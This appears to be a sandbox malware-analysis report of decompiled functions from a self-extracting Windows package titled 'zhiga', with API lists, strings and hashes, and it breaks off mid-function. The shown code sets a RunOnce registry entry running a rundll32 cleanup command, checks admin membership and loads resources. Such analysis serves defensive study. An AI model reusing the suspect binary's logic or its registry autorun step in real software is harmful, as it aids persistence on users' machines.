                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                        • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A345A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A345E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A3460D
                                                                        • MessageBeep.USER32(00000000), ref: 00A34630
                                                                        • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 00A34666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A3466F
                                                                          • Part of subcall function 00A3681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A3686E
                                                                          • Part of subcall function 00A3681F: GetSystemMetrics.USER32(0000004A), ref: 00A368A7
                                                                          • Part of subcall function 00A3681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A368CC
                                                                          • Part of subcall function 00A3681F: RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,?,0000000C), ref: 00A368F4
                                                                          • Part of subcall function 00A3681F: RegCloseKey.ADVAPI32(?), ref: 00A36902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                                        • API String ID: 3244514340-1120439489
                                                                        • Opcode ID: e4796e4bf26b65ed9ba3d76563cd5746d6378aab4b27ec0d55e3c8c0af85778a
                                                                        • Instruction ID: f457f181065cd5d58459071fc2511bfe55b91c820568ff677104d450ac169504
                                                                        • Opcode Fuzzy Hash: e4796e4bf26b65ed9ba3d76563cd5746d6378aab4b27ec0d55e3c8c0af85778a
                                                                        • Instruction Fuzzy Hash: 9E51E572900215AFDB21DF68DC49BBABB79EF49300F144195FD49A7241DB71EE06CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A32773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00A31781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00A3658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00A3658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xa31140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00A31680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}
























                                                                        APIs
                                                                        • CharUpperA.USER32(B6B6972C,00000000,00000000,00000000), ref: 00A327A8
                                                                        • CharNextA.USER32(0000054D), ref: 00A327B5
                                                                        • CharNextA.USER32(00000000), ref: 00A327BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32829
                                                                        • RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A328A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A328AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A328B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A327E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 4522a2e02ad08300fe347211d0689a491b5ae69b0579a494d5517d1e0eb6f5a9
                                                                        • Instruction ID: 99c9fdc04a22294b732611875cc4edb700a3bf33ea018ec525fa49c2a26cc516
                                                                        • Opcode Fuzzy Hash: 4522a2e02ad08300fe347211d0689a491b5ae69b0579a494d5517d1e0eb6f5a9
                                                                        • Instruction Fuzzy Hash: 18418371A0012CAFDB24DBA49C85BFAB7BDEF65700F0440A9F589D2110DB708E868FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00A32267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xa38004; // 0xb6b6972c
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xa38530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00A3658A( &_v268, 0x104, 0xa31140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E00A3171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00A36CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}




















                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A322A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A322D8
                                                                        • memset.MSVCRT ref: 00A322F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A3236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A3237A
                                                                        Strings
                                                                        • wextract_cleanup0, xrefs: 00A3227C, 00A322CD, 00A32363
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A32299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A3232D
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A32321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                        • API String ID: 3027380567-4285006626
                                                                        • Opcode ID: 1f2701dbe645393eb0eec23e905dd44c10d12e8996d190af684700b278a4417f
                                                                        • Instruction ID: 743b5782e046cea0d9a95bd30a70136d29c57022ad95b163e337ec8cdd38ef3e
                                                                        • Opcode Fuzzy Hash: 1f2701dbe645393eb0eec23e905dd44c10d12e8996d190af684700b278a4417f
                                                                        • Instruction Fuzzy Hash: 9231C571A00228BBDB25DB50DC89FEBBB7CEF15700F0401A9B54DAA050EA75AB89CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00A33100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xa38590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xa38590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00A343D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xa38d4c);
                                                                        					SetWindowTextA(_t33, "zhiga");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xa388b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00A330C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00A3313B
                                                                        • GetDesktopWindow.USER32 ref: 00A3314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00A3316A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A33176
                                                                        • SetForegroundWindow.USER32(?), ref: 00A3317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00A33185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00A33190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00A330C0), ref: 00A331A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A331CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: zhiga
                                                                        • API String ID: 3785188418-3705506974
                                                                        • Opcode ID: 7d88a789e7ca989b01011c2537d3c329746f94862572f8bdc9bdf24db2fff0d2
                                                                        • Instruction ID: 0ad9fe422a4a124a388a6350fc34f751b1f30769c88fc3a6d0cf3bd3b996a657
                                                                        • Opcode Fuzzy Hash: 7d88a789e7ca989b01011c2537d3c329746f94862572f8bdc9bdf24db2fff0d2
                                                                        • Instruction Fuzzy Hash: 1011D03220C321BBDF11DFA4AC0DBAA3A64FB6A721F100710F855D61E0DBB89A42D742
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00A3468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}









                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                        • LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                        • memcpy_s.MSVCRT ref: 00A346E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$zhiga
                                                                        • API String ID: 3370778649-3314309
                                                                        • Opcode ID: 787660b419f4b6856fdc05112bf7876a87e66210fbae6870fa7bafa4cf879bb7
                                                                        • Instruction ID: 7585da3eba653d5a6aa345347dbcb721e45ded150858c976967fcde15f7dc967
                                                                        • Opcode Fuzzy Hash: 787660b419f4b6856fdc05112bf7876a87e66210fbae6870fa7bafa4cf879bb7
                                                                        • Instruction Fuzzy Hash: E701A9362442207BE3105BE56C4DF6B7E2CDBDAF51F040415FA8997151CAB1984287B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00A317EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xa3a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E00A36CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}




















                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A318DD), ref: 00A3181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A3182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00A318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A318DD), ref: 00A31855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00A318DD), ref: 00A31883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00A318DD), ref: 00A3188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                        • API String ID: 4204503880-1888249752
                                                                        • Opcode ID: 00a3177e7d115689877bd69aea02f5d92d0c4aee8643ad7ad999bee1689125a2
                                                                        • Instruction ID: d286d753a58efafb6c3093c82453154982e7cb8f8cc7c75271977c7b2def68ec
                                                                        • Opcode Fuzzy Hash: 00a3177e7d115689877bd69aea02f5d92d0c4aee8643ad7ad999bee1689125a2
                                                                        • Instruction Fuzzy Hash: 5A119371E00219ABDB14DFE4DC49ABEBB78EF45701F100569F942E2290DB308D018B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t7;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				int _t22;
                                                                        				struct HWND__* _t24;
                                                                        
                                                                        				_t7 = _a8 - 0x10;
                                                                        				if(_t7 == 0) {
                                                                        					EndDialog(_a4, 2);
                                                                        					L11:
                                                                        					return 1;
                                                                        				}
                                                                        				_t11 = _t7 - 0x100;
                                                                        				if(_t11 == 0) {
                                                                        					_t12 = GetDesktopWindow();
                                                                        					_t24 = _a4;
                                                                        					E00A343D0(_t24, _t12);
                                                                        					SetWindowTextA(_t24, "zhiga");
                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xa39404);
                                                                        					SetForegroundWindow(_t24);
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t11 == 1) {
                                                                        					_t22 = _a12;
                                                                        					if(_t22 < 6) {
                                                                        						goto L11;
                                                                        					}
                                                                        					if(_t22 <= 7) {
                                                                        						L8:
                                                                        						EndDialog(_a4, _t22);
                                                                        						return 1;
                                                                        					}
                                                                        					if(_t22 != 0x839) {
                                                                        						goto L11;
                                                                        					}
                                                                        					 *0xa391dc = 1;
                                                                        					goto L8;
                                                                        				}
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00A33490
                                                                        • GetDesktopWindow.USER32 ref: 00A3349A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A334B2
                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00A334C4
                                                                        • SetForegroundWindow.USER32(?), ref: 00A334CB
                                                                        • EndDialog.USER32(?,00000002), ref: 00A334D8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                        • String ID: zhiga
                                                                        • API String ID: 852535152-3705506974
                                                                        • Opcode ID: f0eede38bf6ef9a3bcd5efd54bd83c511e51678c7cb2d91704bd590cae73570e
                                                                        • Instruction ID: f9dfdd2a2ccd5f2c029cd51cdb44e1304b38686515a94fcc577e79ea7391ee6d
                                                                        • Opcode Fuzzy Hash: f0eede38bf6ef9a3bcd5efd54bd83c511e51678c7cb2d91704bd590cae73570e
                                                                        • Instruction Fuzzy Hash: 0001F733248224ABDF169FA5DC0C9AE7B64EF19702F008110F987965B1CB719F43DB85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00A32AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				int _t21;
                                                                        				char _t32;
                                                                        				intOrPtr _t34;
                                                                        				char* _t38;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				CHAR* _t52;
                                                                        				intOrPtr* _t55;
                                                                        				CHAR* _t59;
                                                                        				void* _t62;
                                                                        				CHAR* _t64;
                                                                        				CHAR* _t65;
                                                                        				signed int _t66;
                                                                        
                                                                        				_t60 = __edx;
                                                                        				_t16 =  *0xa38004; // 0xb6b6972c
                                                                        				_t17 = _t16 ^ _t66;
                                                                        				_v8 = _t16 ^ _t66;
                                                                        				_t65 = _a4;
                                                                        				_t44 = __edx;
                                                                        				_t64 = __ecx;
                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                        					GetModuleFileNameA( *0xa39a3c,  &_v268, 0x104);
                                                                        					while(1) {
                                                                        						_t17 =  *_t64;
                                                                        						if(_t17 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                        						 *_t65 =  *_t64;
                                                                        						if(_t21 != 0) {
                                                                        							_t65[1] = _t64[1];
                                                                        						}
                                                                        						if( *_t64 != 0x23) {
                                                                        							L19:
                                                                        							_t65 = CharNextA(_t65);
                                                                        						} else {
                                                                        							_t64 = CharNextA(_t64);
                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                        									if( *_t64 == 0x23) {
                                                                        										goto L19;
                                                                        									}
                                                                        								} else {
                                                                        									E00A31680(_t65, E00A317C8(_t44, _t65),  &_v268);
                                                                        									_t52 = _t65;
                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                        									_t60 = _t14;
                                                                        									do {
                                                                        										_t32 =  *_t52;
                                                                        										_t52 =  &(_t52[1]);
                                                                        									} while (_t32 != 0);
                                                                        									goto L17;
                                                                        								}
                                                                        							} else {
                                                                        								E00A365E8( &_v268);
                                                                        								_t55 =  &_v268;
                                                                        								_t62 = _t55 + 1;
                                                                        								do {
                                                                        									_t34 =  *_t55;
                                                                        									_t55 = _t55 + 1;
                                                                        								} while (_t34 != 0);
                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                        									 *_t38 = 0;
                                                                        								}
                                                                        								E00A31680(_t65, E00A317C8(_t44, _t65),  &_v268);
                                                                        								_t59 = _t65;
                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                        								_t60 = _t12;
                                                                        								do {
